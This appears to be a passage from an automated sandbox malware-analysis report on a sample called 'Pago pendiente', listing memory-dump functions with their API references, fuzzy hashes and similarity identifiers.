                                                          Function 031AB318 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 031AB37E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 23f0b83119dae942bc71b5cde607d21b2bae17ef04a1062eff497c3ef51b056a
                                                          • Instruction ID: 2b8daf786dbf9aa095d3a1c3b88f5843ace6f36c5179d7bb7a041c4d6d57b14d
                                                          • Opcode Fuzzy Hash: 23f0b83119dae942bc71b5cde607d21b2bae17ef04a1062eff497c3ef51b056a
                                                          • Instruction Fuzzy Hash: 2B11E0BAC047498FCB20CF9AC944ADEFBF4EF88324F14841AD819A7210C379A545CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A5A3C9 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A5A42D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: b5267ff1bd34286f16a47109c81b7d057b5a1dd6cbd84d77f28f725af98ccb1a
                                                          • Instruction ID: ef59bd008ab02c6c99bfe2110aded3c5c0fb08a75e6d3e5aea8e29c4e46affca
                                                          • Opcode Fuzzy Hash: b5267ff1bd34286f16a47109c81b7d057b5a1dd6cbd84d77f28f725af98ccb1a
                                                          • Instruction Fuzzy Hash: 8211E3B58002499FDB20CF9AD885BDEBBF8EB48320F108419E915A7200D375A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07723924 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq
                                                          • API String ID: 0-348098666
                                                          • Opcode ID: ab60161b81742c57d4cf37b6a18b2d17440d9bdcd6d592e82491e3c6e25c28ad
                                                          • Instruction ID: be11fb3b89b99b8e5eea5cceab60d61ffd0a2a176afa581e1222aa12cf875ed5
                                                          • Opcode Fuzzy Hash: ab60161b81742c57d4cf37b6a18b2d17440d9bdcd6d592e82491e3c6e25c28ad
                                                          • Instruction Fuzzy Hash: DB51D2B1B106168FCB15EB79888887FBBF6FFC53607148929E469DB351EB309D068790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07728F67 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: O};5
                                                          • API String ID: 0-3558557551
                                                          • Opcode ID: 6fca99df655e2ccc8fbc56ec64bb268e470b02d14432d46d7ffedaff1c538ca5
                                                          • Instruction ID: e9980c42163b9a6f71c22b363af71f34536cd7e0b5dbba16285fd6ab748fda28
                                                          • Opcode Fuzzy Hash: 6fca99df655e2ccc8fbc56ec64bb268e470b02d14432d46d7ffedaff1c538ca5
                                                          • Instruction Fuzzy Hash: 8341BE70A2425ADFCB44CF95D58489EFFF2FF89210F6488D5E095AB328D7359A12CB04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07728F78 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: O};5
                                                          • API String ID: 0-3558557551
                                                          • Opcode ID: f0e10fd846cfe176ba5e3a24aa9bff052fb2c22a8bca03eb57b740dc11b0ab04
                                                          • Instruction ID: 18d97ae55b1f91c438e704b268363a561851f68b149ae03b1c6d0bb2536b7632
                                                          • Opcode Fuzzy Hash: f0e10fd846cfe176ba5e3a24aa9bff052fb2c22a8bca03eb57b740dc11b0ab04
                                                          • Instruction Fuzzy Hash: FF416D70A24219DFCB44CF95D5858AEFFF2FB89200F60D895E459AB318D7319A11DB14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07726EC1 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3H5
                                                          • API String ID: 0-3899204960
                                                          • Opcode ID: 0ceb14ef88e5f10622f5e7d13c968f57fc4886e72dddf856b696746c6fdb0409
                                                          • Instruction ID: b903188da74ab854ed7006f78d7f9c6b8404e3c20aeb2cf12fc822c7ac49c7c1
                                                          • Opcode Fuzzy Hash: 0ceb14ef88e5f10622f5e7d13c968f57fc4886e72dddf856b696746c6fdb0409
                                                          • Instruction Fuzzy Hash: FE41ADB5A10249AFCB05CFA9C48095EFFF2FF8A340F18C59AD455AB661D731EA41DB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07726DC8 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3H5
                                                          • API String ID: 0-3899204960
                                                          • Opcode ID: 0998dddf0982bf9813473bac5cbb8165bea9c12e2531fbca91805d8e5c18b493
                                                          • Instruction ID: 5f02d58b1cf7b783bb8725baa13cb3a941b55f97a2b5ea8fccfef615bb8d5723
                                                          • Opcode Fuzzy Hash: 0998dddf0982bf9813473bac5cbb8165bea9c12e2531fbca91805d8e5c18b493
                                                          • Instruction Fuzzy Hash: 742188B0D1524A9FCB05CFA9C4806AEBFF1FF8A200F2485AAD154EB251E7309A41DB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07723914 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq
                                                          • API String ID: 0-348098666
                                                          • Opcode ID: a0967349a4de6de91ff7a335502c5be5212ba0ffe451d7804796447eab2f5ac1
                                                          • Instruction ID: efc3dbc1306ec61c422316825dd0412258d8e6435c9b21f19dcb16c5399dd71c
                                                          • Opcode Fuzzy Hash: a0967349a4de6de91ff7a335502c5be5212ba0ffe451d7804796447eab2f5ac1
                                                          • Instruction Fuzzy Hash: B8118FB1F0021A8BCB04EBB999105FFB6F2AF89351F50446AD814E7244EB358D06DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772E338 Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e20f47a883a785c7cae49eed0e0ee4a32b0ec6f11c47dbee1c07d777af2a2a5
                                                          • Instruction ID: 4aafe52032baecf47c4591f380e4952a6b36671e40fcb0e37d47d6933d25fd91
                                                          • Opcode Fuzzy Hash: 7e20f47a883a785c7cae49eed0e0ee4a32b0ec6f11c47dbee1c07d777af2a2a5
                                                          • Instruction Fuzzy Hash: 7051F3B0B241218FD7108B79880C73AB7A2BB82755F58C57AF0768B2C2D7B9C842D751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 077230D8 Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0bf503779a92e9d72cdd89a00ee4ac1e71c44ae78edba4e9022c2323d52c2fb5
                                                          • Instruction ID: f6b67ca6db2f6f7bb5964d7034dd532c4fa2a4afa40f4fb422313e8e8732937b
                                                          • Opcode Fuzzy Hash: 0bf503779a92e9d72cdd89a00ee4ac1e71c44ae78edba4e9022c2323d52c2fb5
                                                          • Instruction Fuzzy Hash: 8651F3F1A15529CBCB10CFA9C8416BEF7B2FB46381F108926E47597281C73CDA02DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772C8A8 Relevance: .2, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6b866db63e6cf2f04c20b4f6df0d1c5a2659329449c611b1cfe5e6f1c0e5013
                                                          • Instruction ID: 7939c3f0755eca352f00e86982d5a1201bf50996d65bf991fe94b349993e69e2
                                                          • Opcode Fuzzy Hash: c6b866db63e6cf2f04c20b4f6df0d1c5a2659329449c611b1cfe5e6f1c0e5013
                                                          • Instruction Fuzzy Hash: 9B51B1B1E043499FCF15DFA8C844AEEBFF4EF49250F1484AAE854E7212E7349905DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07726F38 Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ce97dc35085ec909166352327c1c2d0b76d295e505a7f7bbaa58a29d954f917
                                                          • Instruction ID: 51695ab70ba33e4acd4306a625395088caed576a4d3f1489c819cde13c692ede
                                                          • Opcode Fuzzy Hash: 5ce97dc35085ec909166352327c1c2d0b76d295e505a7f7bbaa58a29d954f917
                                                          • Instruction Fuzzy Hash: C65124B8E002199FCB04CFA9C98499EBBF2FF89310F158496E914AB361D735A942CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07728E10 Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 45a50d6b94fdd4c8ac7130d463ebb6eb305ac207eb6e17ef5f559804d77c2b95
                                                          • Instruction ID: d7e9c3e52a261e038b00fea138da9aafa0a209f3a812663a90f3828edbc7b24f
                                                          • Opcode Fuzzy Hash: 45a50d6b94fdd4c8ac7130d463ebb6eb305ac207eb6e17ef5f559804d77c2b95
                                                          • Instruction Fuzzy Hash: 32419CB49297C49FC706DB6AD444848BFB0EF8A215F1A84D6D484CF3B3D635A946CB13
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 077290F3 Relevance: .1, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f4221d7616b438c566bce587343522f2bf8c207afcfa2f47d02a6c9b454b23b
                                                          • Instruction ID: ff3455dac2ffa548de86738a1f876b2a2ce91bd452114caae1c98c0443281e74
                                                          • Opcode Fuzzy Hash: 8f4221d7616b438c566bce587343522f2bf8c207afcfa2f47d02a6c9b454b23b
                                                          • Instruction Fuzzy Hash: DC418BB4E1021ADFCB05CF95D8459EEBBB2FF89300F14982AE514BB254D7709A418F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07729100 Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27c3076505709bbb1538c5afe8c461105c2cbba4f184d9f230a8e3187af16298
                                                          • Instruction ID: 5c2acc09a2862c6ee4fd1eac1c083c077b1bc54692c0331788fa577e14610990
                                                          • Opcode Fuzzy Hash: 27c3076505709bbb1538c5afe8c461105c2cbba4f184d9f230a8e3187af16298
                                                          • Instruction Fuzzy Hash: 384199B0E1021ADFCB04CF9AD8859EEBBB2FF89310F149429E514BB354D7709A418F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772E498 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4180576bcb25a0c267a3c7edfb00ccaf680ed40c93ebe20b5155d838ce94d345
                                                          • Instruction ID: c12c3e7e7a1bbef220deac0388957a494a80d58c05ff0e6b8e600893e973f97e
                                                          • Opcode Fuzzy Hash: 4180576bcb25a0c267a3c7edfb00ccaf680ed40c93ebe20b5155d838ce94d345
                                                          • Instruction Fuzzy Hash: 3931A4B0E205268BC7448FBAD84827AB7B2FB46250F14866AE5B5D2380E378D552D7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772E329 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b57e7fe6d5267ab12744ebb7b9fb3192115eef25b58e7dbfbc186ec19e998327
                                                          • Instruction ID: bbd116ce6e9142fade41cab03e663224b4bbb0a3651da028a8636d8b6cc86a03
                                                          • Opcode Fuzzy Hash: b57e7fe6d5267ab12744ebb7b9fb3192115eef25b58e7dbfbc186ec19e998327
                                                          • Instruction Fuzzy Hash: A031C2B0B49261CFD3118F24981DB757B62AB82B49F5984BAF0658F2C3CAB58806DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07723240 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ce0a2b9d97577002a0661f686cfa31d44d5ea01c49d8d2576c4d2c85b29bdc1a
                                                          • Instruction ID: 4281ca25e8692c6bed5f5ffe6cd67a0fe87f4983f21a4e88ebebdc75ac10bb19
                                                          • Opcode Fuzzy Hash: ce0a2b9d97577002a0661f686cfa31d44d5ea01c49d8d2576c4d2c85b29bdc1a
                                                          • Instruction Fuzzy Hash: 5921B4F5B104298BDB00CF94C8427BABBB1FB45741F108956E961DB285D63DD902DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772329A Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d238219aff8d65829496b889cc0c268312ce179dfa27d1df7d2089c0a903c549
                                                          • Instruction ID: f3270908eed455fe8adc2c4779e32feb9ba9abbbe3bb037cb175162c3e86f345
                                                          • Opcode Fuzzy Hash: d238219aff8d65829496b889cc0c268312ce179dfa27d1df7d2089c0a903c549
                                                          • Instruction Fuzzy Hash: 8D3106B1A19272CBD7004B68C81477DB7A2EB42354F5889B7D4798F183CB3D8683E711
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 018FD36C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1439f7d5b92ede3a955daf8f054b763de637a9d16cacda660cb78deccc0ddca3
                                                          • Instruction ID: 1275e92e99456409302147a07fa255f2eded40cb12a79c7233c79f973413fe02
                                                          • Opcode Fuzzy Hash: 1439f7d5b92ede3a955daf8f054b763de637a9d16cacda660cb78deccc0ddca3
                                                          • Instruction Fuzzy Hash: 71214971504204DFCB06DF98D5C4B16BB65FB84318F24C66DDB098B346C33AD946CA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 018FD1B4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e67a2d37ca187c21bd1fde5090f5a64d6f89a1bc28630470aecd201d14ea8959
                                                          • Instruction ID: 0c87fe6ced0ce2138047b8d1aff01e729e9a2662df8c313c19f1f1112da3bc9c
                                                          • Opcode Fuzzy Hash: e67a2d37ca187c21bd1fde5090f5a64d6f89a1bc28630470aecd201d14ea8959
                                                          • Instruction Fuzzy Hash: 8C212979504304DFDB06DF98C5C0B26BB65FB84328F24C66DEB098B346C33AE546CAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772B505 Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80f3134b9930e3fd2678a59dce59094c8ae7e6977604bcad9ec2f11f144ce530
                                                          • Instruction ID: d10c33e877b732b60123326e1e23964108742f5c0e7aae01b8e9bb72d1aaa777
                                                          • Opcode Fuzzy Hash: 80f3134b9930e3fd2678a59dce59094c8ae7e6977604bcad9ec2f11f144ce530
                                                          • Instruction Fuzzy Hash: 193112B4D10258DFDB20CF9AC984BCEBFF4AB48354F24841AE414BB250D7755846CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07723984 Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4e4dbfc2146a170ed249a7f341939c7100c74cd484a910e5de37f75268d0ae2
                                                          • Instruction ID: c061d2bda68d4fb9a379975c1d43658d87f19fa8f34e9e8f399be3edba4d14b6
                                                          • Opcode Fuzzy Hash: b4e4dbfc2146a170ed249a7f341939c7100c74cd484a910e5de37f75268d0ae2
                                                          • Instruction Fuzzy Hash: 7A31F2B0D11218DFDB20CF9AC584B8EBFF4EB48314F24841AE514BB250D7B55945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07720B71 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7df8f4255f5eae79a0ae4b0f5574b2799f2e5b2110e2a40c4427c79e85057895
                                                          • Instruction ID: 5e386325b094f3489e274adc2f726a8a9e937febbe032a3ad133b6f759f6d097
                                                          • Opcode Fuzzy Hash: 7df8f4255f5eae79a0ae4b0f5574b2799f2e5b2110e2a40c4427c79e85057895
                                                          • Instruction Fuzzy Hash: 1C1127F1A28635CBD7288E69DC813BEB7A5F782364F14853AE476C7290C638D942D260
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07728EA0 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfe22ebe3853dfb1ae36014f24b3950ba874105420d1d22dfdbd2f940a5094dc
                                                          • Instruction ID: 0d537a571f77d661120cec5f91f47fda3d4903b9de3c9da85447b43a3385b756
                                                          • Opcode Fuzzy Hash: cfe22ebe3853dfb1ae36014f24b3950ba874105420d1d22dfdbd2f940a5094dc
                                                          • Instruction Fuzzy Hash: 2221AFB4A20918DFD748DF5AE085999BFF1FF88314F5280D5E8889B325DB31E9A1CB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772B294 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9aa6210ad8b50668d5057957d1d90072652bc3af088f86f85a336f8d75a05cff
                                                          • Instruction ID: 09f8ca45dc9be5d45678331733dc6652f0fb7b4eee6f554c63fc56849754c7c6
                                                          • Opcode Fuzzy Hash: 9aa6210ad8b50668d5057957d1d90072652bc3af088f86f85a336f8d75a05cff
                                                          • Instruction Fuzzy Hash: E12114B68003499FCB20CF9AC884ADEBFF4FB58310F50841AE919A7210C374A945DFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 018FD1AF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                          • Instruction ID: e7dbf48e8be6084f8c7de3cf5ba33c846d49a861a7d871a447d7ad70167c6daf
                                                          • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                          • Instruction Fuzzy Hash: 7311DD7A504280CFDB02CF54C5C4B15BFA1FB84324F24C6AEDA498B256C33AE50ACBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 018FD367 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                          • Instruction ID: 3e3f5fe4c3fb10bab5a9d273f299b8157188af22cafb73d03006109d3b543b25
                                                          • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                          • Instruction Fuzzy Hash: 6411BB76504280CFDB02CF58D5C4B15BBA1FB84318F24C6ADDA098B656C33AE54ACBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772B320 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 740294529c13f37a064e5d8b4b233f77cb5e15e7568ae7174caa1ae85f0449e0
                                                          • Instruction ID: 8dee683523455163f0101b2a134c84c7aa1ce7cea284226b32264de64435c551
                                                          • Opcode Fuzzy Hash: 740294529c13f37a064e5d8b4b233f77cb5e15e7568ae7174caa1ae85f0449e0
                                                          • Instruction Fuzzy Hash: 4301F7F65047628BD722EA38C8505BF7B71EFC12E0B15055AD8B1C7252FA308906D361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 018ED745 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007451309.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18ed000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
